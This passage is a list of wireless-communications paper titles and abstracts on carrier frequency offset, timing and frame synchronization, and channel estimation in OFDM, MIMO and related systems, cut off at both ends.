Maximization paper_content: In this paper, a joint channel, carrier-frequency-offset (CFO) and noise-variance estimation scheme is proposed for OFDM systems which is based on Expectation and Maximization (EM) algorithm. The channel parameters are estimated using training sequences incorporated at the beginning of each transmission frame. Based on the assumption that the amplitude and CFO of different paths are independent, the received multipath components may be decomposed into $L$ independent data sets of the $L$ resolvable propagation paths. Hence the associated multi-dimensional minimization problem may be decomposed into separate single-dimensional minimization processes, the maximum likelihood and yet, remains capable of approaching performance at a signifucantly reduced complexity. --- paper_title: Exact BER analysis of FRFT-OFDM system over frequency selective Rayleigh fading channel with CFO paper_content: The bit error rate expression of the binary phase-shift keying modulation scheme has been derived in a frequency selective fading channel for the fractional Fourier transform (FRFT) based orthogonal frequency-division multiplexing (OFDM) system in the presence of carrier frequency offset (CFO). The performance of the FRFT based OFDM system has been found to be better than FFT-based OFDM at different values of FRFT angle parameter `α'. --- paper_title: Gabor Division/Spread Spectrum System Is Separable in Time and Frequency Synchronization paper_content: Recently proposed new Time-Domain (TD) synchronization using frequency integration and TD Spread Spectrum (SS) codes has been shown to be robust to frequency offset, that has its dual Frequency-Domain (FD) synchronization using time integration and FD SS codes which is robust to timing offset. Separable Property (SP) is defined for time-frequency synchronization under the condition containing time and frequency deviations to be performed separately and cooperatively. The SP compels us to design phase correction on SS codes and transmitted data. --- paper_title: Sensing orthogonal frequency division multiplexing systems for cognitive radio with cyclic prefix and pilot tones paper_content: The detection of orthogonal frequency division multiplexing (OFDM) for cognitive radio is considered in this paper. A frequency-selective fading channel is considered and the receiving process is modeled with timing and frequency offsets. Firstly, the authors propose a new decision statistic based on time-domain cross-correlation of the cyclic prefix (CP) embedded in OFDM signals. The probability distribution functions (PDFs) of the statistics under both hypotheses of primary signal absence and presence are derived. Estimation of the timing and frequency offset is obtained through the maximum likelihood method and the received signals are modified. Then another new decision statistic based on frequency-domain cross-correlation of the pilot tones (PTs) is proposed whose PDF is also analyzed. Then, through the likelihood ratio test, the authors utilize CP and PT jointly and propose a global test statistic. The theoretical probabilities of false alarm (PFA) and detection are derived, and the theoretical threshold for any given PFA is proposed. The simulation results show that the proposed spectrum-sensing scheme has excellent performance, especially under very low signal-to-noise ratio (SNR). --- paper_title: Widely Linear MVDR Beamformers for Noncircular Signals Based on Time-Averaged Second-Order Noncircularity Coefficient Estimation paper_content: The optimal widely linear (WL) minimum variance distortionless response (MVDR) beamformer, which has a powerful performance for the reception of a noncircular signal, was proposed by Chevalier in 2009. Nevertheless, in spectrum monitoring or passive listening, the optimal WL MVDR beamformer is hard to implement due to an unknown second-order (SO) noncircularity coefficient. This paper aims at estimating the time-averaged SO noncircularity coefficient of a desired noncircular signal, whose waveform is unknown but whose steering vector is known, in the context of the optimal WL MVDR beamformer. The proposed noncircularity coefficient estimator can process 2N - 1 rectilinear signals at most using an array of N sensors. Moreover, a frequency-shift WL MVDR beamforming algorithm is proposed for a noncircular signal having a nonnull frequency offset or carrier residue, jointly with the estimation of the frequency offset of the rectilinear signal. Due to the inevitable estimation error of the time-averaged SO noncircularity coefficient, a diagonal loading technique is used to enhance the robustness of the optimal WL beamformers. Simulations are shown to verify the effectiveness of the proposed algorithms. --- paper_title: Joint estimation of Carrier and Sampling Frequency Offset, phase noise, IQ Offset and MIMO channel for LTE Advanced UL MIMO paper_content: In LTE Advanced Uplink MIMO the pilot symbols on a subcarrier and OFDM symbol are not transmitted exclusively by one layer. If the pilots are transmitted exclusively, like in LTE Advanced Downlink or Mobile WiMAX, the estimation of Carrier Frequency Offset (CFO) and Sampling Frequency Offset (SFO) can be based on correlating two pilot symbols at different OFDM symbols. In addition the estimation of CFO / SFO can be performed separately from IQ Offset and channel estimation. In LTE Advanced Uplink (UL) the pilot symbols on a subcarrier and OFDM symbol are transmitted by all layers simultaneously. As the received symbol consists of the sum of all transmitted pilot symbols, the CFO / SFO estimation approaches used for SISO seem not applicable anymore. This paper introduces a joint estimation of carrier and sampling frequency offset, phase noise, IQ offset and MIMO channel for LTE Advanced UL MIMO. --- paper_title: E2KF based joint multiple CFOs and channel estimate for MIMO-OFDM systems over high mobility scenarios paper_content: An enhanced extended Kalman filtering (E2KF) algorithm is proposed in this paper to cope with the joint multiple carrier frequency offsets (CFOs) and time-variant channel estimate for MIMO-OFDM systems over high mobility scenarios. It is unveiled that, the auto-regressive (AR) model not only provides an effective method to capture the dynamics of the channel parameters, which enables the prediction capability in the EKF algorithm, but also suggests an method to incorporate multiple successive pilot symbols for the improved measurement update. --- paper_title: An Improved Frequency Offset Estimation Based on Companion Matrix in Multi-User Uplink Interleaved OFDMA Systems paper_content: In this letter, we consider a multiuser uplink orthogonal frequency-division multiple access (OFDMA) system. To estimate the carrier frequency offset (CFO) efficiently, a modified pilot structure has been proposed to allow sufficient frequency separation between the subcarriers allocated to any two users. The proposed structure can reduce the ambiguity problem caused by the multiple signal classification (MUSIC) based algorithm when a CFO of one user is close to that of a different user. We present a CFO estimation method based on the companion matrix obtained using the received signal from the proposed pilot structure. Simulation results show that the proposed CFO estimator performs better than the conventional estimator and maintains its performance as the CFO range increases. --- paper_title: Channel Equalization and Symbol Detection for Single-Carrier MIMO Systems in the Presence of Multiple Carrier Frequency Offsets paper_content: A new frequency-domain channel equalization and symbol detection scheme is proposed for multiple-input-multiple-output (MIMO) single-carrier broadband wireless systems in the presence of severely frequency-selective channel fading and multiple unknown carrier-frequency offsets (CFOs). Multiple CFOs cause severe phase distortion in the equalized data for large block lengths and/or constellation sizes, thus yielding poor detection performance. Instead of explicitly estimating the CFOs and then compensating them, the proposed scheme estimates the rotated phases (not frequencies) caused by multiple unknown CFOs and then removes the phase rotations from the equalized data before symbol detection. The estimation accuracy of the phase rotation is improved by utilizing a groupwise method rather than symbol-by-symbol methods. This paper differs from other related work in orthogonal frequency division multiplexing (OFDM) studies in that it can combat multiple CFOs that are time varying within each block. Numerical examples for 4 × 2 and 8 × 4 single-carrier systems with quaternary phase-shift keying (QPSK) and eight-phase-shift keying (8PSK) modulation illustrate the effectiveness of the proposed scheme in terms of scatter plots of constellation, mean square error (MSE), and bit error rate (BER). --- paper_title: Simple Carrier Recovery Approach for RF-Pilot-Assisted PDM-CO-OFDM Systems paper_content: For RF-pilot-assisted PDM-CO-OFDM systems, we propose and demonstrate a carrier recovery method applying a simple moving average filter (MAF) to extract the central RF-pilot for phase noise compensation. Because only two additions per output sample would be required to implement such a MAF, its computational complexity is rather simple compared to any other direct-form finite impulse response (FIR) filter. To handle its weak side-lobe attenuation, which would cause the spectrally nearby OFDM signal to interfere with the extracted pilot signal, we further propose using multiple MAFs in cascade to enhance the side-lobe attenuation. We evaluate the performance of a 16-QAM and 40-Gbps PDM-CO-OFDM signal, in terms of the bandwidth tolerance, optical signal to noise ratio (OSNR) tolerance, nonlinear tolerance, linewidth tolerance, and residual carrier frequency offset (RFO) tolerance, with different filters including the simple MAF, cascaded MAFs, and the previously-demonstrated multi-stage decimation and interpolation filter (MDIF). We've found that 1) all the filters exhibit similar performance to the ideal brick-wall filter in terms of noise and nonlinear tolerances, 2) the MAF1 exhibits the worse tolerances against linewidth and RFO, and 3) the MDIF has to be carefully designed to enhance its tolerances against both the linewidth and RFO. --- paper_title: Novel Coarse Timing Synchronization Methods in OFDM Systems Using Fourth-Order Statistics paper_content: In this paper, the problem of coarse timing synchronization in orthogonal frequency-division multiplexing (OFDM) systems is investigated, and two new timing metrics with better performance are presented. The new metrics take advantage of two novel differential normalization functions that are based on the fourth-order statistics and are designed depending on the value of carrier frequency offset (CFO). The proposed timing metrics are theoretically evaluated using two different class separability criteria. It is shown that the new schemes considerably increase the difference between the correct and wrong timing points in comparison with previous methods. The computational complexity of the new methods is obtained, and their superior detection performances are also demonstrated in terms of probabilities of false alarm and missed detection. The results indicate that due to a significant improvement in missed detection probability (MDP), the new methods offer a considerably wider range of acceptable thresholds. --- paper_title: Joint Clock and Frequency Synchronization for OFDM-Based Cellular Systems paper_content: In cellular systems, a basestation and mobile stations need to be synchronized before data exchange. Since the basestation clock reference is more accurate, a mobile station typically derives its clock reference from the basestation. But the carrier frequency offset due to Doppler shift may have harmful effects on the local clock derivation. This letter proposes a joint clock and frequency synchronization technique between a basestation and a mobile station, which is effective even with Doppler shift. We derive the joint estimation algorithm by analyzing the phase and the amplitude distortion caused by the sampling frequency offset and the carrier frequency offset. Simulation results showing the effectiveness of the proposed algorithm will also be presented. --- paper_title: Maximum Likelihood Estimation of Time and Carrier Frequency Offset for DVB-T2 paper_content: The new terrestrial digital video broadcasting standard DVB-T2 provides a specific symbol - called P1-symbol - for the initial time and frequency synchronization. In this paper the maximum likelihood (ML) time and carrier frequency offset (CFO) synchronization scheme, which exploits the structure of the P1 symbol in both time and frequency domains is derived. Two lower-complexity solutions are then proposed: (1) a ML estimator that only exploits the time structure of the P1 symbol and (2) a pseudo ML (PML) scheme that resorts to a suboptimal CFO estimator while still performing ML time synchronization. The proposed schemes are compared in terms of both synchronization capabilities and implementation complexity. The Cramer-Rao bounds for the CFO estimators are also evaluated. Simulation results in a typical DVB-T2 scenario show that both ML and PML schemes have a very close performance while significantly outperforming existing schemes. --- paper_title: An improved ESPRIT-based blind CFO estimation for OFDM in the presence of I/Q imbalance paper_content: The estimation of carrier frequency offset (CFO) is an important issue in the study of OFDM systems. In the past, many CFO estimation methods have been proposed. In particular, the ESPRIT-based blind CFO estimation method is attractive because of its bandwidth efficiency. It can yield accurate estimates and it works for non constant modulus modulation symbols. This paper improves the ESPRIT-based method in two ways. Firstly, we show how the information of virtual carrier location can be exploited to further enhance the estimation accuracy. Secondly, we also derive a new algorithm that can estimate CFO in the presence of I/Q imbalance. --- paper_title: Data-Aided Timing Synchronization for FM-DCSK UWB Communication Systems paper_content: Frequency-modulated differential chaos shift keying (FM-DCSK) ultrawideband (UWB) communication systems convey information by transmitting ultrashort chaotic pulses (in the nanosecond scale). Since such pulses are ultrashort, timing offset may severely degrade the bit error rate (BER) performance. In this paper, a fast data-aided timing synchronization algorithm with low complexity is proposed for FM-DCSK UWB systems, which capitalizes on the excellent correlation characteristic of chaotic signals. Simulation results show that the BER performance of such systems is fairly close to that of perfect timing thanks to the proposed new algorithm. Moreover, the new algorithm requires less synchronization searching time and lower computational complexity than the conventional one for transmitted reference UWB systems existing in the current literature. --- paper_title: Blind symbol rate estimation using autocorrelation and zero crossing detection paper_content: In this paper we introduce a new and simple method to estimate the symbol rate for single carrier systems of unknown modulation. The introduced technique detects the symbol rate from a continuous range of symbol rates, i.e. it does not assume a finite set of candidate symbol rates. The method does not require any knowledge about system parameters and is therefore totally blind. The method belongs to the family of autocorrelation-based symbol rate estimators, yet, unlike many such schemes, its performance is insensitive to the value of the roll-off factor. We then propose a simple method for frequency offset compensation also based on the autocorrelation function. The proposed estimator is implemented as part of a complete DVB-C [1] receiver and is verified using simulations and results in robust performance even at low SNR and high frequency offsets. --- paper_title: Performance Analysis of Code-Aided Symbol Timing Recovery on AWGN Channels paper_content: We analyze the performance of a code-aided (CA) decision-directed (DD) timing synchronizer, which can exploit the dependence structure across coded symbols to improve the timing recovery accuracy. Due to the inherent coupling between timing recovery and decoding, most existing studies rely on extensive simulation rather than on analytical methods to evaluate performance of timing recovery for coded systems. We propose analytical methods in this paper towards this end. A first key step is to approximate timing-offset-induced inter-symbol interference (ISI) as an additive Gaussian noise, since in the low signal-to-noise ratio (SNR) regime the background noise is large enough to mask the ISI. Then, we derive semi-analytical expressions for the mean and variance of extrinsic information as functions of timing offset, building on which we characterize both open-loop and closed-loop performance of decision-directed timing synchronizers. Monte Carlo simulation results corroborate that the proposed method accurately characterizes the performance of CA DD timing recovery, for systems with a wide range of channel bandwidth and different channel codes. --- paper_title: Intercarrier Interference Cancellation Using General Phase Rotated Conjugate Transmission for OFDM Systems paper_content: In this paper, we propose a general phase rotated conjugate cancellation (PRCC) scheme for intercarrier interference (ICI) cancellation in orthogonal frequency division multiplexing (OFDM) systems. It is shown that the previous conjugate cancellation (CQ scheme is equivalent to a special case of our proposed scheme. The general PRCC scheme contains advantages of the conventional CC scheme, such as backward compatibility with the existing OFDM systems, low receiver complexity, and two-path diversity, but provides better performance, especially at high frequency offset situations. --- paper_title: Improved fine CFO synchronization for MB-OFDM UWB paper_content: Proposed is an improved blind carrier frequency offset (CFO) estimator suitable for Multi-Band OFDM Ultra Wideband (MB-OFDM UWB) system. By exploiting the conjugate symmetry of the physical layer convergence protocol (PLCP) the need for training symbols can be avoided and estimation performance is improved as well. Computer simulations show that the proposed method achieves better estimation performance than existing method. --- paper_title: Schmidl-Cox-like Frequency Offset Estimation in Time-Hopping UWB paper_content: This paper presents a time hopping ultra wide band (TH-UWB) receiver design targeted to high performance and low complexity. The classical Schmidl and Cox idea of extracting the frequency offset from the phase of a correlation measure between two identical transmitted signals is here extended to a TH format. The algorithm exploits the low duty cycle of the time hopping access, and combines received samples in order to strengthen the signal-to-noise ratio. A clever selection of which samples to use in the correlation measure (first and last third of the received signal) is proved to perform 0.5 dB from the Cramer-Rao lower bound, thus providing an improvement of 0.75 dB with respect to the standard approach of the literature (correlating the first and second halves of the received signal). A modified algorithm that suitably weights received samples is also proposed for achieving robustness in impulsive multiple user access scenarios. --- paper_title: Joint Carrier Frequency Offset and Channel Estimation for MIMO-OFDM Systems Using Extended H_{∞} Filter paper_content: We address the problem of joint carrier frequency offset (CFO) and channel estimation for multiple-input multiple-output (MIMO) orthogonal frequency-division multiplexing (OFDM) systems over time-varying channels. The CFOs between different pairs of transmit and receive antennas are considered to be different. The method is derived based on the extended H∞ filter (EHF). Compared to the conventional extended Kalman filter (EKF)-based method, the EHF-based method does not require any knowledge of the noise distributions, so it is more flexible and robust to the unknown disturbances. Simulation results are provided to illustrate the performance of this method. --- paper_title: Pilot-aided estimation of carrier frequency offsets and channel impulse responses for OFDM cooperative communications paper_content: We consider a cooperative communication system where the destination node receives an orthogonal frequency-division multiplexing (OFDM) signal transmitted from two relay nodes. We propose and compare two pilot-aided algorithms for the estimation of the carrier frequency offsets (CFOs) and the channel impulse responses (CIRs) associated with the two relay-destination links. The first algorithm uses a basis expansion model (BEM) to estimate a time-varying (TV) multiple-input single-output (MISO) channel that incorporates both CFOs and CIRs effects. The CFOs are then extracted from the estimated TV-MISO channel by applying estimation of signal parameters via rotational invariance techniques (ESPRIT). The second algorithm exploits the structure of a specific pilot sequence and estimates the CFOs by directly applying ESPRIT on the observed signal. Simulation results show the effectiveness of the proposed algorithms. --- paper_title: A Subspace-Based CFO Estimation Algorithm for General ICI Self-Cancellation Precoded OFDM Systems paper_content: This paper presents a carrier-frequency-offset (CFO) estimation algorithm for time-dispersive orthogonal frequency division multiplexing (OFDM) system using a general inter-carrier interference (ICI) self-cancellation scheme. This study uses the time shift invariant property in the precoded signal to estimate the CFO. To achieve this, the proposed algorithm first collects the highly correlated receive time samples into snapshot vectors. The snapshot vectors can be expressed in a form having a CFO-directed response structure, which enables the proposed approach to estimate the CFO by using the multiple signal classfication (MUSIC) algorithm in the time domian. This study also develops a time sample selection scheme to mitigate the noise enhancement caused in the equalization process before the MUSIC algorithm. As compared to conventional algorithms, in addition to having an estimation error approaching to the Cramer-Rao lower bound (CRLB), the proposed algorithm has an adjustable CFO estimation range linearly proportional to the order of the ICI self-cancellation scheme. --- paper_title: A Novel Distributed Translator for an ATSC Terrestrial DTV System paper_content: This paper presents a new design and implementation method of distributed translator (DTxR), termed the equalization DTxR (EDTxR), for distributed translator network in ATSC systems. EDTxR has a simple structure and does not require any devices to be added to studio or transmitter facilities already deployed. EDTxRs which retransmit the same transmitter signal can have identical output symbol streams among them without additional synchronization information by utilizing the structure of the equalization digital on-channel repeater (EDOCR). Moreover, they can synchronize output frequency among them without global positioning system (GPS) clock receivers by adopting a crystal oscillator for each translator and compensating the frequency offset of the each crystal oscillator through the carrier and timing recovery. To verify the proposed method, multiple EDTxRs are implemented and tested in the laboratory and in the field. Through the tests, it is confirmed that EDTxR is a simple and economic distributed translator for distributed transmission system which does not need additional synchronization devices. Therefore, EDTxR can be a promising translator for coverage extension of digital terrestrial television broadcasting under spectrum deficient situations. --- paper_title: The Cramer-Rao Bound for Training Sequence Design for Burst-Mode CPM paper_content: In this paper, we study the Cramer-Rao bound (CRB) for continuous phase modulation (CPM) signals where frequency offset, carrier phase, and symbol timing are jointly estimated when transmitted over an additive white Gaussian noise (AWGN) channel. We consider a data-aided (DA) estimation scenario in which the estimator takes advantage of a known training sequence at the start of each burst. Thus, we first derive the joint CRBs as functions of a known training sequence and CPM parameters. By analyzing the CRB expressions, we propose the optimum training sequence for which the CRB is minimized. We show that the same training sequence is optimum for all three estimation parameters. Additionally, we compare the performance of the optimum training sequence with a random one by providing a closed-form expression for the unconditional CRB (UCRB) for symbol timing estimation of CPM signals. Comparing the UCRB and the CRB for the optimum training sequence reveals that a DA estimator with the optimum training sequence leads to significant gains in terms of the mean-square error of the estimation parameter when the underlying CPM scheme is non-binary and/or partial response. --- paper_title: Integer Frequency Offset Estimation for OFDM Systems With Residual Timing Offset Over Frequency Selective Fading Channels paper_content: Accurate integer frequency offset (IFO) estimation is crucial for orthogonal frequency-division multiplexing (OFDM) systems, particularly in the presence of frequency-selective fading and residual timing offset (RTO). For existing algorithms, however, it is still a challenge to obtain a good tradeoff among the estimation performance, complexity, and spectrum overhead. In this paper, we propose a novel cross ambiguity function (CAF)-based IFO estimator using only one training sequence. By designing the training sequence, which has only a single sharp peak on its ambiguity function surface, a highly accurate and full acquisition range estimation of the IFO can be obtained in the presence of frequency-selective fading and RTO. Moreover, the adoption of the CAF expression in terms of time-domain signals ensures that the complexity of the proposed algorithm is relatively low. Simulation results verify its superior accuracy in frequency-selective fading channels and in the presence of RTO. --- paper_title: Low complexity scheme for carrier frequency offset estimation in orthogonal frequency division multiple access uplink paper_content: Maximum likelihood (ML) carrier-frequency offset estimation for orthogonal frequency-division multiple access uplink is a complex multi-parameter estimation problem. The ML approach is a global optima search problem, which is prohibitive for practical applications because of the requirement of multidimensional exhaustive search for a large number of users. There are a few attempts to reduce the complexity of ML search by applying evolutionary optimisation algorithms. In this study, the authors propose a novel canonical particle swarm optimisation (CPSO)-based scheme, to reduce the computational complexity without compromising the performance and premature convergence. The proposed technique is a two-step process, where, in the first step, low resolution alternating projection frequency estimation (APFE) is used to generate a single better positioned particle for CPSO, followed by an actual CPSO procedure in second step. The mean square error performance of the proposed scheme is compared with existing low complexity algorithms namely APFE and linear particle swarm optimisation with mutation. Simulation results presented in this study show that the new scheme completely avoids premature convergence for a large number of users as high as 32. --- paper_title: A ranging method for OFDMA uplink system paper_content: In orthogonal frequency division multiple access (OFDMA) uplink system, estimations of time delay and carrier frequency offset (CFO) are both particularly challenging. In IEEE 802.16-based networks, such synchronization problem can be resolved in initial ranging process. In this paper, exploiting the unique scheme of interleaved OFDMA, a special ranging symbol which has repetitive scheme in time-domain is designed. Furthermore, a novel ranging method for OFDMA system is proposed by utilizing such repetitive characteristic. Compared with the existing methods, this algorithm just need one ranging symbol and can get more correct estimation of time delay, at the same time, it can estimate the integral CFO in OFDMA uplink. Simulations illustrate efficiency of the proposed algorithm over the existing method. --- paper_title: Adaptive schemes and analysis for blind beamforming with insufficient cyclic prefix in single carrierfrequency division multiple access systems paper_content: When the duration of the cyclic prefix (CP) is shorter than that of the channel impulse response in single carrier-frequency division multiple access systems, inter-symbol interference and inter-carrier interference will degrade the system performance. Previously, one solution of this problem while considering the effect of carrier frequency offsets (CFOs) and the co-channel interference is a blind received beamforming scheme based on eigenanalysis in a batch mode. As the capability in suppressing the multipath signal with the delay larger than the CP length has not previously been analysed theoretically for the scheme, the theoretical analysis regarding the capability in suppressing the long-delayed multipath signal is provided in this study. The analysis provided in this study is also utilised to design an adaptive processing scheme. The adaptive algorithm is developed to find the beamforming weight vector updated on a per symbol basis without using reference signals. The proposed adaptive algorithm reduces the computational complexity of and shows competitive performance under the insufficient CP, the CFOs, the co-channel interference and the time-varying scenarios. The simulation results reveal that the proposed adaptive algorithm provides better performance than the previously proposed algorithm. --- paper_title: Initial-Estimation-Based Adaptive Carrier Recovery Scheme for DVB-S2 System paper_content: A data-aided (DA) carrier recovery (CR) method, which can select different coarse frequency estimation (CFE) paths adaptively according to the initial-estimation of frequency offset, is proposed for the 2nd Generation Digital Video Broadcasting Satellite (DVB-S2) system to accomplish the convergence within at most 400 pilot blocks. The well-known two-step CR scheme is used for the consideration of precision and speed, whereas both the CFE and the fine frequency estimation (FFE) adopt L&R algorithm as their basic frequency estimator so that the same correlation operation can be used by both of them to decrease the realization complexity. Optimum threshold values for different CFE paths are determined by analyzing the ill-selection probability and robust Root Mean Square Error (RMSE) performance has been confirmed by our simulations. --- paper_title: FS-FBMC: A flexible robust scheme for efficient multicarrier broadband wireless access paper_content: An alternative implementation of the filter bank multicarrier (FBMC) concept is introduced. It is based on an FFT whose size is the length of the prototype filter. The approach clarifies the connection with OFDM and its main benefit is in the receiver, where high performance sub-channel equalization and timing offset compensation are achieved in a straightforward manner without additional delay. The scheme is particularly appropriate for broadband wireless access, to cope with fragmented frequency bands and to optimize the utilization of the spectrum, for example with the help of water-filling based sub-channel loading algorithms. The context of TV white spaces is taken for illustration. An issue with the proposed scheme is the computational complexity in the receiver and an approach having the potential for substantial savings is mentioned. --- paper_title: Diversity analysis of distributed linear convolutive space-time codes for time-frequency asynchronous cooperative networks paper_content: This study analyses the achievable cooperative diversity order of the distributed linear convolutional space-time coding (DLC-STC) scheme for time–frequency asynchronous cooperative networks. The authors first prove that perfect time or frequency synchronisation is impractical for cooperative networks with multiple relays serving multiple destinations even when the relays know all accurate time delays and frequency offsets. Then the DLC-STC scheme, in which the exact time synchronisation at the relay nodes is unnecessary, is introduced into this type of cooperative networks. This study proves that the achievable time–frequency asynchronous cooperative diversity order of the DLC-STC scheme with maximum-likelihood receivers is equal to the number of relays. Simulation results verify the analysis. --- paper_title: On the Cyclostationarity of OFDM and Single Carrier Linearly Digitally Modulated Signals in Time Dispersive Channels: Theoretical Developments and Application paper_content: Previous studies on the cyclostationarity aspect of orthogonal frequency division multiplexing (OFDM) and single carrier linearly digitally modulated (SCLD) signals assumed simplified signal and channel models or considered only second-order cyclostationarity. This paper presents new results concerning the cyclostationarity of these signals under more general conditions, including time dispersive channels, additive Gaussian noise, and carrier phase, frequency, and timing offsets. Analytical closed-form expressions are derived for time- and frequency-domain parameters of the cyclostationarity of OFDM and SCLD signals. In addition, a condition to eliminate aliasing in the cycle and spectral frequency domains is derived. Based on these results, an algorithm is developed for recognizing OFDM versus SCLD signals. This algorithm obviates the need for commonly required signal preprocessing tasks, such as signal and noise power estimation and the recovery of symbol timing and carrier information. --- paper_title: Comments on "A Technique for Orthogonal Frequency Division Multiplexing Frequency Offset Correction" paper_content: This comment corrects a few errors found in the derivation of the maximum likelihood estimate of differential phase in the paper, "A Technique for Orthogonal Frequency Division Multiplexing Frequency Offset Correction." We show that the problem of differential phase estimation can be considered as an estimation problem in the presence of nuisance parameters, which does not satisfy strong ancillarity. The approach in the above paper to solve this problem can be understood as conditioning for elimination of nuisance parameters but without taking proper steps. After making corrections on the proof, it is demonstrated that the estimator in the above paper is inherently suboptimal and thus prior knowledge on the nuisance parameters, if available, can be utilized to further improve the estimation performance. --- paper_title: Error probability expressions for frame synchronization using differential correlation paper_content: Probabilistic modeling and analysis of correlation metrics have been receiving considerable interest for a long period of time because they can be used to evaluate the performance of communication receivers, including satellite broadcasting receivers. Although differential correlators have a simple structure and practical importance over channels with severe frequency offsets, closed-form expressions for the output distribution of differential correlators do not exist. In this paper, we present detection error probability expressions for frame synchronization using differential correlation, and demonstrate their accuracy over channel parameters of practical interest. The derived formulas are presented in terms of the Marcum Q-function, and do not involve numerical integration, unlike the formulas derived in some previous studies. We first determine the distributions and error probabilities for single-span differential correlation metric, and then extend the result to multi-span differential correlation metric with certain approximations. The results can be used for the performance analysis of various detection strategies that utilize the differential correlation structure. --- paper_title: An efficient algorithm for space-time block code classification paper_content: This paper proposes a novel and efficient algorithm for space-time block code (STBC) classification, when a single antenna is employed at the receiver. The algorithm exploits the discriminating features provided by the discrete Fourier transform (DFT) of the fourth-order lag products (FOLPs) of the received signal. It does not require estimation of the channel, signal-to-noise ratio (SNR), and modulation of the transmitted signal. Computer simulations are conducted to evaluate the performance of the proposed algorithm. The results show the validity of the algorithm, its robustness to carrier frequency offset, and low sensitivity to timing offset. --- paper_title: Gaussian Particle Filtering Approach for Carrier Frequency Offset Estimation in OFDM Systems paper_content: We propose Gaussian particle filtering (PF) approach for estimating carrier frequency offset (CFO) in OFDM systems. PF is more powerful especially for nonlinear problems where classical approaches (e.g., maximum likelihood estimators) may not show optimal performance. Standard PF undergoes the particle impoverishment (PI) problem resulting from resampling process for this static parameter (i.e., CFO) estimation. Gaussian PF (GPF) avoids the PI problem because resampling process is not needed in the algorithm. We show that GPF outperforms current approaches in this nonlinear estimation problem. --- paper_title: Frame Synchronization of Coded Modulations in Time-Varying Channels via Per-Survivor Processing paper_content: In this letter, an optimum frame synchronizer is proposed for coded modulations in channels with uncertainties. Coded modulations include various frame synchronization scenarios, e.g., convolutionally coded transmissions and nonlinear modulations with memory. Frame synchronization is proposed as a maximum a posteriori probability estimation implemented using trellis path search for Markov chain decoding. In addition, time-varying uncertainties such as frequency offset and phase noise are jointly estimated via per-survivor processing as frame synchronization proceeds. The proposed frame synchronizer exploits the coding gain of coded modulations to achieve better performance than conventional frame synchronizers. We show that the resulting frame synchronizer consists of a correlation term and two data correction terms. Numerical results show that the proposed frame synchronizer is robust to uncertainties at the receiver and it exhibits improved performance. --- paper_title: Timing Estimation and Resynchronization for Amplify-and-Forward Communication Systems paper_content: This paper proposes a general framework to effectively estimate the unknown timing and channel parameters, as well as design efficient timing resynchronization algorithms for asynchronous amplify-and-forward (AF) cooperative communication systems. In order to obtain reliable timing and channel parameters, a least squares (LS) estimator is proposed for initial estimation and an iterative maximum-likelihood (ML) estimator is derived to refine the LS estimates. Furthermore, a timing and channel uncertainty analysis based on the Crame?r-Rao bounds (CRB) is presented to provide insights into the system uncertainties resulted from estimation. Using the parameter estimates and uncertainty information in our analysis, timing resynchronization algorithms that are robust to estimation errors are designed jointly at the relays and the destination. The proposed framework is developed for different AF systems with varying degrees of timing misalignment and channel uncertainties and is numerically shown to provide excellent performances that approach the synchronized case with perfect channel information. --- paper_title: Second-Order Cyclostationarity of Mobile WiMAX and LTE OFDM Signals and Application to Spectrum Awareness in Cognitive Radio Systems paper_content: Spectrum sensing and awareness are challenging requirements in cognitive radio (CR). To adequately adapt to the changing radio environment, it is necessary for the CR to detect the presence and classify the on-the-air signals. The wireless industry has shown great interest in orthogonal frequency division multiplexing (OFDM) technology. Hence, classification of OFDM signals has been intensively researched recently. Generic signals have been mainly considered, and there is a need to investigate OFDM standard signals, and their specific discriminating features for classification. In this paper, realistic and comprehensive mathematical models of the OFDM-based mobile Worldwide Interoperability for Microwave Access (WiMAX) and third-Generation Partnership Project Long Term Evolution (3GPP LTE) signals are developed, and their second-order cyclostationarity is studied. Closed-from expressions for the cyclic autocorrelation function (CAF) and cycle frequencies (CFs) of both signal types are derived, based on which an algorithm is proposed for their classification. The proposed algorithm does not require carrier, waveform, and symbol timing recovery, and is immune to phase, frequency, and timing offsets. The classification performance of the algorithm is investigated versus signal-to-noise ratio (SNR), for diverse observation intervals and channel conditions. In addition, the computational complexity is explored versus the signal type. Simulation results show the efficiency of the algorithm is terms of classification performance, and the complexity study proves the real time applicability of the algorithm. --- paper_title: Self-Cancellation of Sample Frequency Offset in OFDM Systems in the Presence of Carrier Frequency Offset paper_content: A self-cancellation scheme is proposed to cope with the sample frequency offset (SFO) problem in OFDM systems in the presence of a carrier frequency offset (CFO). Making use of the symmetry between the phase shifts caused by SFO and the subcarrier index, we put the same constellation symbol on symmetrical subcarriers, and combine the pairs at the receiver coherently. In this way, the SFO effects are approximately cancelled with the price of cutting down the bandwidth efficiency by half. However some array gain and diversity gain are obtained from the symmetrical combining. Our scheme can work well together with the phase tracking for residual CFO, so that both SFO and residual CFO can be removed with low complexity. Simulations show that, our scheme effectively removes the effect of SFO; the proposed system outperforms the ideal normal OFDM systems (with no SFO) under the same energy efficiency at high SNR, so the proposed system will also outperform the normal system that using the same overhead for SFO estimation. Finally, a mixed system is proposed to mitigate the drawbacks of our design and the normal OFDM systems for the SFO compensation. Our scheme may be helpful for the synchronization of multiple SFOs in the cooperative transmission. --- paper_title: Joint estimation and suppression of phase noise and carrier frequency offset in multiple-input multiple-output single carrier frequency division multiple access with single-carrier space frequency block coding paper_content: Carrier frequency offset (CFO) and phase noise are challenging problems in single carrier frequency division multiple access (SC-FDMA) system. In this study, the authors have studied single-carrier space frequency block coding (SC-SFBC) to reduce the peak to average power ratio (PAPR) of the multiple-input multiple-output (MIMO) SC-FDMA signal, in which Alamouti SFBC will change the signal spectrum structure, break the single-carrier property and increase PAPR. Also, the authors propose a joint algorithm to suppress the inter-carrier interference (ICI) caused by phase noise and CFO. Conventional methods are to estimate phase noise and CFO in other algorithms, which are pretty difficult and complicated to obtain accurate estimation results. Unlike the conventional works, the novelty of the authors proposed algorithm is that it directly calculates the interference components and then reconstructs the ICI matrix. Thus, it avoids the degrading interactions between phase noise and CFO estimations. The proposed algorithm exploits block-type pilot, which is a common pilot pattern in SC-FDMA communications and is used in other wireless communication standards. Simulation results show that the suppression performance keeps smooth while phase noise and CFO varies, and BER performance degradation can be significantly reduced in 3 dB. --- paper_title: Frequency Offset Estimation for Unknown QAM Constellations paper_content: We introduce a novel, both gain and signal-to-noise ratio independent, constellation unaware, blind frequency offset estimation procedure for QAM signals. Asymptotic performance analysis and numerical simulations show that the herein presented method outperforms a selected state of the art blind constellation unaware estimator, especially for cross constellations. --- paper_title: A Robust Estimation of Residual Carrier Frequency Offset With I/Q 